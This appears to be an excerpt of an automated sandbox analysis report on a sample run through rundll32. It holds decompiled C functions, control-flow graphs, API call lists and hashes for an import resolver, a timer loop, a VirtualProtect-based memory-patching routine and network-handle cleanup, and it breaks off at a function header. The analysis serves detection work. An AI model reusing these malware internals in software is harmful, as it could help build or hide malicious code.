                                          • Instruction ID: e49471f540f1dc1c0a614be10e1542f390e1ccaea71d6d159217fe5cca49d44e
                                          • Opcode Fuzzy Hash: c00a5eb98782da59e172fa76290a6bc5c5b26f5612bfc81c0c465bfec178f152
                                          • Instruction Fuzzy Hash: C4414C71600A44FFDB319FA9DC48EAB7BF9EB45B04B184E29F542D1190EB75AE44CB20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04897EB5 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 241 4897eb5-4897f1a 242 4897f3b-4897f65 241->242 243 4897f1c-4897f36 RaiseException 241->243 245 4897f6a-4897f76 242->245 246 4897f67 242->246 244 48980eb-48980ef 243->244 247 4897f89-4897f8b 245->247 248 4897f78-4897f83 245->248 246->245 249 4897f91-4897f98 247->249 250 4898033-489803d 247->250 248->247 260 48980ce-48980d5 248->260 254 4897fa8-4897fb5 LoadLibraryA 249->254 255 4897f9a-4897fa6 249->255 252 4898049-489804b 250->252 253 489803f-4898047 250->253 256 48980c9-48980cc 252->256 257 489804d-4898050 252->257 253->252 258 4897ff8-4898004 InterlockedExchange 254->258 259 4897fb7-4897fc7 GetLastError 254->259 255->254 255->258 256->260 265 489807e-489808c GetProcAddress 257->265 266 4898052-4898055 257->266 269 489802c-489802d FreeLibrary 258->269 270 4898006-489800a 258->270 267 4897fc9-4897fd5 259->267 268 4897fd7-4897ff3 RaiseException 259->268 263 48980e9 260->263 264 48980d7-48980e4 260->264 263->244 264->263 265->256 272 489808e-489809e GetLastError 265->272 266->265 271 4898057-4898062 266->271 267->258 267->268 268->244 269->250 270->250 273 489800c-4898018 LocalAlloc 270->273 271->265 274 4898064-489806a 271->274 276 48980aa-48980ac 272->276 277 48980a0-48980a8 272->277 273->250 278 489801a-489802a 273->278 274->265 279 489806c-489806f 274->279 276->256 280 48980ae-48980c6 RaiseException 276->280 277->276 278->250 279->265 281 4898071-489807c 279->281 280->256 281->256 281->265
                                          C-Code - Quality: 51%
                                          			E04897EB5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x4890000;
				_t115 = _t139[3] + 0x4890000;
				_t131 = _t139[4] + 0x4890000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x4890000;
				_v16 = _t139[5] + 0x4890000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x4890002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x489a1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x489a1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x489a1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x489a1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x489a1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x489a1b8; // 0x0
										 *_t102 = _t125;
										 *0x489a1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x489a1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                                          0x04897ec4
                                          0x04897eda
                                          0x04897ee0
                                          0x04897ee2
                                          0x04897ee7
                                          0x04897eed
                                          0x04897ef2
                                          0x04897ef5
                                          0x04897f03
                                          0x04897f0a
                                          0x04897f0d
                                          0x04897f10
                                          0x04897f11
                                          0x04897f14
                                          0x04897f17
                                          0x04897f1a
                                          0x04897f1f
                                          0x04897f2e
                                          0x00000000
                                          0x04897f34
                                          0x04897f3e
                                          0x04897f48
                                          0x04897f4d
                                          0x04897f4f
                                          0x04897f59
                                          0x04897f5c
                                          0x04897f5f
                                          0x04897f65
                                          0x04897f67
                                          0x04897f67
                                          0x04897f6a
                                          0x04897f6d
                                          0x04897f72
                                          0x04897f76
                                          0x04897f89
                                          0x04897f8b
                                          0x04898033
                                          0x04898033
                                          0x0489803a
                                          0x0489803d
                                          0x04898047
                                          0x04898047
                                          0x0489804b
                                          0x048980c9
                                          0x048980cc
                                          0x048980ce
                                          0x048980ce
                                          0x048980d5
                                          0x048980d7
                                          0x048980e1
                                          0x048980e4
                                          0x048980e7
                                          0x048980e7
                                          0x00000000
                                          0x0489804d
                                          0x04898050
                                          0x0489807e
                                          0x04898088
                                          0x0489808c
                                          0x04898094
                                          0x04898097
                                          0x0489809e
                                          0x048980a8
                                          0x048980a8
                                          0x048980ac
                                          0x048980b1
                                          0x048980c0
                                          0x048980c6
                                          0x048980c6
                                          0x048980ac
                                          0x00000000
                                          0x04898057
                                          0x0489805a
                                          0x04898062
                                          0x04898077
                                          0x0489807c
                                          0x00000000
                                          0x00000000
                                          0x0489807c
                                          0x00000000
                                          0x04898062
                                          0x04898050
                                          0x0489804b
                                          0x04897f91
                                          0x04897f98
                                          0x04897fa8
                                          0x04897fab
                                          0x04897fb1
                                          0x04897fb5
                                          0x04897ff8
                                          0x04898004
                                          0x0489802d
                                          0x04898006
                                          0x0489800a
                                          0x04898010
                                          0x04898018
                                          0x0489801a
                                          0x0489801d
                                          0x04898023
                                          0x04898025
                                          0x04898025
                                          0x04898018
                                          0x0489800a
                                          0x00000000
                                          0x04898004
                                          0x04897fbd
                                          0x04897fc0
                                          0x04897fc7
                                          0x04897fd7
                                          0x04897fda
                                          0x04897fea
                                          0x00000000
                                          0x04897ff0
                                          0x04897fd1
                                          0x04897fd5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04897fd5
                                          0x04897fa2
                                          0x04897fa6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04897fa6
                                          0x04897f7f
                                          0x04897f83
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04897F2E
                                          • LoadLibraryA.KERNEL32(?), ref: 04897FAB
                                          • GetLastError.KERNEL32 ref: 04897FB7
                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04897FEA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                          • String ID: $
                                          • API String ID: 948315288-3993045852
                                          • Opcode ID: 0ad713d0263d20ff31aab4037b2cf9f6d302afe60e08fa762a5ecfa3ea441373
                                          • Instruction ID: 7ff3a14df98de0b50ccd01e63f9b7b277a93d4db6629e1c029f9c4feb9914f29
                                          • Opcode Fuzzy Hash: 0ad713d0263d20ff31aab4037b2cf9f6d302afe60e08fa762a5ecfa3ea441373
                                          • Instruction Fuzzy Hash: EE813D71A10A06AFDF14EF99D880AADB7F4FB48700F188929E915E7340EB74ED05CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04896B13 Relevance: 16.7, APIs: 11, Instructions: 151timememoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 283 4896b13-4896b45 memset CreateWaitableTimerA 284 4896b4b-4896ba4 _allmul SetWaitableTimer WaitForMultipleObjects 283->284 285 4896cc6-4896ccc GetLastError 283->285 287 4896baa-4896bad 284->287 288 4896c2e-4896c34 284->288 286 4896cd0-4896cda 285->286 289 4896bb8 287->289 290 4896baf call 48967e2 287->290 291 4896c35-4896c39 288->291 295 4896bc2 289->295 296 4896bb4-4896bb6 290->296 293 4896c49-4896c4d 291->293 294 4896c3b-4896c43 RtlFreeHeap 291->294 293->291 297 4896c4f-4896c59 CloseHandle 293->297 294->293 298 4896bc6-4896bcb 295->298 296->289 296->295 297->286 299 4896bcd-4896bd4 298->299 300 4896bde-4896c0b call 4895803 298->300 299->300 301 4896bd6 299->301 304 4896c5b-4896c60 300->304 305 4896c0d-4896c18 300->305 301->300 307 4896c7f-4896c87 304->307 308 4896c62-4896c68 304->308 305->298 306 4896c1a-4896c25 call 48929f2 305->306 314 4896c2a 306->314 309 4896c8d-4896cbb _allmul SetWaitableTimer WaitForMultipleObjects 307->309 308->288 311 4896c6a-4896c7d call 4893f62 308->311 309->298 313 4896cc1 309->313 311->309 313->288 314->288
                                          C-Code - Quality: 83%
                                          			E04896B13(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				intOrPtr _t68;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x489a2e0);
					_v76 = 0;
					_v80 = 0;
					L048981CA();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x489a30c; // 0x2cc
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x489a2ec = 5;
						} else {
							_t69 = E048967E2(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x489a300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E04895803( &_v96, _t75, _t78, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_t68 = E048929F2(_t75,  &_v72, _a4, _a8); // executed
							_v124.HighPart = _t68;
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x489a2e4);
							goto L21;
						} else {
							__eflags =  *0x489a2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E04893F62();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x489a2e8);
								L21:
								L048981CA();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t65;
								__eflags = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							RtlFreeHeap( *0x489a2d8, 0, _t54); // executed
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

































                                          0x04896b13
                                          0x04896b29
                                          0x04896b2d
                                          0x04896b32
                                          0x04896b39
                                          0x04896b3f
                                          0x04896b45
                                          0x04896ccc
                                          0x04896b4b
                                          0x04896b4b
                                          0x04896b4d
                                          0x04896b52
                                          0x04896b53
                                          0x04896b59
                                          0x04896b5d
                                          0x04896b61
                                          0x04896b6f
                                          0x04896b7d
                                          0x04896b81
                                          0x04896b83
                                          0x04896b90
                                          0x04896b9c
                                          0x04896b9e
                                          0x04896ba4
                                          0x04896bad
                                          0x04896bb8
                                          0x04896bb8
                                          0x04896baf
                                          0x04896baf
                                          0x04896bb6
                                          0x00000000
                                          0x00000000
                                          0x04896bb6
                                          0x04896bc2
                                          0x00000000
                                          0x04896bc6
                                          0x04896bcb
                                          0x04896bd6
                                          0x04896bd6
                                          0x04896bde
                                          0x04896be4
                                          0x04896bec
                                          0x04896bf5
                                          0x04896bfc
                                          0x04896c00
                                          0x04896c05
                                          0x04896c0b
                                          0x00000000
                                          0x00000000
                                          0x04896c0d
                                          0x04896c11
                                          0x04896c18
                                          0x00000000
                                          0x04896c1a
                                          0x04896c25
                                          0x04896c2a
                                          0x04896c2a
                                          0x00000000
                                          0x04896c5b
                                          0x04896c5b
                                          0x04896c60
                                          0x04896c7f
                                          0x04896c81
                                          0x04896c86
                                          0x04896c87
                                          0x00000000
                                          0x04896c62
                                          0x04896c62
                                          0x04896c68
                                          0x00000000
                                          0x04896c6a
                                          0x04896c6a
                                          0x04896c6f
                                          0x04896c71
                                          0x04896c76
                                          0x04896c77
                                          0x04896c8d
                                          0x04896c8d
                                          0x04896c95
                                          0x04896ca3
                                          0x04896ca7
                                          0x04896cb3
                                          0x04896cb5
                                          0x04896cb9
                                          0x04896cbb
                                          0x00000000
                                          0x04896cc1
                                          0x00000000
                                          0x04896cc1
                                          0x04896cbb
                                          0x04896c68
                                          0x00000000
                                          0x04896c60
                                          0x04896c2e
                                          0x04896c30
                                          0x04896c34
                                          0x04896c35
                                          0x04896c35
                                          0x04896c39
                                          0x04896c43
                                          0x04896c43
                                          0x04896c49
                                          0x04896c4c
                                          0x04896c4c
                                          0x04896c53
                                          0x04896c53
                                          0x04896cda
                                          0x00000000

                                          APIs
                                          • memset.NTDLL ref: 04896B2D
                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04896B39
                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04896B61
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04896B81
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,04892E0E,?), ref: 04896B9C
                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,04892E0E,?,00000000), ref: 04896C43
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04892E0E,?,00000000,?,?), ref: 04896C53
                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04896C8D
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 04896CA7
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04896CB3
                                            • Part of subcall function 048967E2: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,052493D8,00000000,?,76DDF710,00000000,76DDF730), ref: 04896831
                                            • Part of subcall function 048967E2: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05249410,?,00000000,30314549,00000014,004F0053,052493CC), ref: 048968CE
                                            • Part of subcall function 048967E2: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04896BB4), ref: 048968E0
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04892E0E,?,00000000,?,?), ref: 04896CC6
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                          • String ID:
                                          • API String ID: 3521023985-0
                                          • Opcode ID: 03ef32bb66409c7af55e335dd03ede7084c6709ca47505a5bc16255bbb0c84e1
                                          • Instruction ID: 806f706ac6967fdd0b915d5a4a9445023a1775aab221a5b4d12c61b2e7376e23
                                          • Opcode Fuzzy Hash: 03ef32bb66409c7af55e335dd03ede7084c6709ca47505a5bc16255bbb0c84e1
                                          • Instruction Fuzzy Hash: DD51AEB0508720BFDB10AF159C44DABBBE8EB84324F184F19F8A5E2250E775AD04CF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6E376 Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 316 b6e376-b6e397 call b737a8 319 b6e39d-b6e39e 316->319 320 b6e479 316->320 321 b6e404-b6e40b 319->321 322 b6e3a0-b6e3a3 319->322 323 b6e47f-b6e48e VirtualProtect 320->323 324 b6e44c-b6e461 VirtualProtect 321->324 325 b6e40d-b6e414 321->325 326 b6e4d0-b6e4dc call b737e3 322->326 327 b6e3a9 322->327 328 b6e490-b6e4a6 VirtualProtect 323->328 329 b6e4ab-b6e4b1 GetLastError 323->329 324->323 331 b6e463-b6e477 324->331 325->324 330 b6e416-b6e422 325->330 332 b6e3af-b6e3b6 327->332 328->332 329->326 330->323 335 b6e424-b6e431 VirtualProtect 330->335 336 b6e448-b6e44a VirtualProtect 331->336 337 b6e3f8-b6e3ff 332->337 338 b6e3b8-b6e3bc 332->338 335->323 339 b6e433-b6e447 335->339 336->323 337->326 338->337 340 b6e3be-b6e3da lstrlen VirtualProtect 338->340 339->336 340->337 341 b6e3dc-b6e3f6 lstrcpy VirtualProtect 340->341 341->337
                                          APIs
                                          • lstrlen.KERNEL32(?,?,?,?,00000000,?,00B517D3,?), ref: 00B6E3C4
                                          • VirtualProtect.KERNEL32(00000000,00000000,00000040,00000200,?,?,?,00000000,?,00B517D3,?), ref: 00B6E3D6
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00B6E3E5
                                          • VirtualProtect.KERNEL32(00000000,00000000,00000200,00000200,?,?,?,00000000,?,00B517D3,?), ref: 00B6E3F6
                                          • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000400,00B75038,00000018,00B62C60,?,?,?,00000000,?,00B517D3,?,?), ref: 00B6E42D
                                          • VirtualProtect.KERNEL32(?,00000004,?,?,?,?,?,00000000,?,00B517D3,?,?,?,00000000,00000000), ref: 00B6E448
                                          • VirtualProtect.KERNEL32(?,00000004,00000040,?,00B75038,00000018,00B62C60,?,?,?,00000000,?,00B517D3,?,?,?), ref: 00B6E45D
                                          • VirtualProtect.KERNEL32(?,00000004,00000040,?,00B75038,00000018,00B62C60,?,?,?,00000000,?,00B517D3,?,?,?), ref: 00B6E48A
                                          • VirtualProtect.KERNEL32(?,00000004,?,?,?,?,?,00000000,?,00B517D3,?,?,?,00000000,00000000), ref: 00B6E4A4
                                          • GetLastError.KERNEL32(?,?,?,00000000,?,00B517D3,?,?,?,00000000,00000000), ref: 00B6E4AB
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 3676034644-0
                                          • Opcode ID: b0aa88422686077cfd8a2f2ba74d576814fa19735a7d26a3def60cf108151af3
                                          • Instruction ID: f5fae300378d74f340e5c5531c6bfeb7ac0f0230ff5f72a76eee95c0e9a88825
                                          • Opcode Fuzzy Hash: b0aa88422686077cfd8a2f2ba74d576814fa19735a7d26a3def60cf108151af3
                                          • Instruction Fuzzy Hash: 71414DB5900709EFDB219F64CC44E6EBBF9FB08350F008565E666A76A0DB38E805DF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048915B9 Relevance: 12.1, APIs: 8, Instructions: 75networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 93%
                                          			E048915B9(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E04893A6F(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					FindCloseChangeNotification(_t20); // executed
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E04894C73(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E04894C73(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E04894C73(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E04894C73(_t46);
				}
				return _t24;
			}












                                          0x048915b9
                                          0x048915b9
                                          0x048915bb
                                          0x048915bd
                                          0x048915c4
                                          0x048915cb
                                          0x048915cb
                                          0x048915d0
                                          0x048915d3
                                          0x048915da
                                          0x048915e3
                                          0x048915e7
                                          0x048915ec
                                          0x048915ec
                                          0x048915ee
                                          0x048915f3
                                          0x048915f7
                                          0x048915fc
                                          0x048915fc
                                          0x048915fe
                                          0x04891603
                                          0x04891607
                                          0x0489160c
                                          0x0489160c
                                          0x0489160e
                                          0x04891619
                                          0x0489161c
                                          0x0489161c
                                          0x0489161e
                                          0x04891623
                                          0x04891626
                                          0x04891626
                                          0x04891628
                                          0x0489162f
                                          0x04891632
                                          0x04891637
                                          0x0489163a
                                          0x0489163a
                                          0x0489163d
                                          0x04891642
                                          0x04891645
                                          0x04891645
                                          0x0489164a
                                          0x0489164e
                                          0x04891651
                                          0x04891651
                                          0x04891656
                                          0x0489165b
                                          0x00000000
                                          0x0489165e
                                          0x04891665

                                          APIs
                                          • InternetSetStatusCallback.WININET(?,00000000), ref: 048915E7
                                          • InternetCloseHandle.WININET(?), ref: 048915EC
                                          • InternetSetStatusCallback.WININET(?,00000000), ref: 048915F7
                                          • InternetCloseHandle.WININET(?), ref: 048915FC
                                          • InternetSetStatusCallback.WININET(?,00000000), ref: 04891607
                                          • InternetCloseHandle.WININET(?), ref: 0489160C
                                          • FindCloseChangeNotification.KERNEL32(?,00000000,00000102,?,?,048953E9,?,?,00000000,00000000,76DC81D0), ref: 0489161C
                                          • CloseHandle.KERNEL32(?,00000000,00000102,?,?,048953E9,?,?,00000000,00000000,76DC81D0), ref: 04891626
                                            • Part of subcall function 04893A6F: WaitForMultipleObjects.KERNEL32(00000002,04897B35,00000000,04897B35,?,?,?,04897B35,0000EA60), ref: 04893A8A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Internet$Close$Handle$CallbackStatus$ChangeFindMultipleNotificationObjectsWait
                                          • String ID:
                                          • API String ID: 2172891992-0
                                          • Opcode ID: 52f0022135931a32f48528dcc2b3477f82ff7ce3c9e97688d07c5b27d2b0065e
                                          • Instruction ID: e7ae80fc570a5a739e0e3621b3aa113821fbae0abe0d362731a1cce13a6f8f43
                                          • Opcode Fuzzy Hash: 52f0022135931a32f48528dcc2b3477f82ff7ce3c9e97688d07c5b27d2b0065e
                                          • Instruction Fuzzy Hash: E2113D76A04E496BD931AEAAED88C0BB7EEEB4474435D0E19E046D3520CB74FD448B64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B67DF1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
